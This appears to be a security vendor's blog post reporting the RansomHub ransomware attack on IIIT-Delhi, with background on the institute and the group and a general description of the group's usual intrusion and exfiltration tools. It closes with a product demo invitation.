RansomHub Ransomware Attack Exposes 140GB Data at IIIT-Delhi
RansomHub Ransomware Attack on IIIT-Delhi
Indraprastha Institute of Information Technology Delhi (IIIT-Delhi), a prominent educational institution in India, has been targeted by the ransomware group RansomHub. The attack, discovered on September 2, 2024, has led to a significant data breach, with 140GB of sensitive information, including personally identifiable information (PII) and non-disclosure agreements (NDAs), being compromised.
About IIIT-Delhi
Established in 2008, IIIT-Delhi is a state university located in Okhla, New Delhi. The institute offers a range of undergraduate, postgraduate, and doctoral programs, primarily focusing on engineering and technology. It is recognized for its research-led approach to education and has a strong faculty base with numerous projects and collaborations addressing real-world challenges. The campus spans 25 acres and includes state-of-the-art laboratories, a comprehensive library, and recreational facilities.
Attack Overview
The ransomware attack on IIIT-Delhi was orchestrated by RansomHub, a Ransomware-as-a-Service (RaaS) group known for its aggressive affiliate model and double extortion tactics. The attack resulted in the exfiltration of 140GB of sensitive data, posing a serious threat to the privacy and security of the institution's stakeholders. The breach highlights the vulnerabilities in the institution's cybersecurity infrastructure, making it a target for sophisticated threat actors.
About RansomHub
RansomHub emerged in February 2024 and quickly established itself in the ransomware landscape. The group is known for its speed and efficiency, using advanced data exfiltration techniques and intermittent encryption to minimize encryption time while maintaining impact. RansomHub affiliates primarily use phishing campaigns, vulnerability exploitation, and password spraying to gain initial access to target systems. The group has a reputation for targeting high-value sectors such as healthcare, financial services, and government.
Penetration Methods
RansomHub likely penetrated IIIT-Delhi's systems through a combination of phishing campaigns and exploiting unpatched vulnerabilities. The group's affiliates are known to use tools like Mimikatz and PsExec for lateral movement and privilege escalation. They also employ advanced techniques for data exfiltration, using tools like WinSCP and AWS S3 to transfer stolen data to remote servers or cloud storage.
Impact and Implications
The ransomware attack on IIIT-Delhi underscores the growing threat of ransomware to educational institutions. The breach not only compromises sensitive data but also disrupts the institution's operations and tarnishes its reputation. As IIIT-Delhi continues to address the fallout from this attack, it serves as a stark reminder of the importance of cybersecurity measures in protecting against sophisticated threat actors like RansomHub.
Sources
See Halcyon in action
Interested in getting a demo?
Fill out the form to meet with a Halcyon Anti-Ransomware Expert!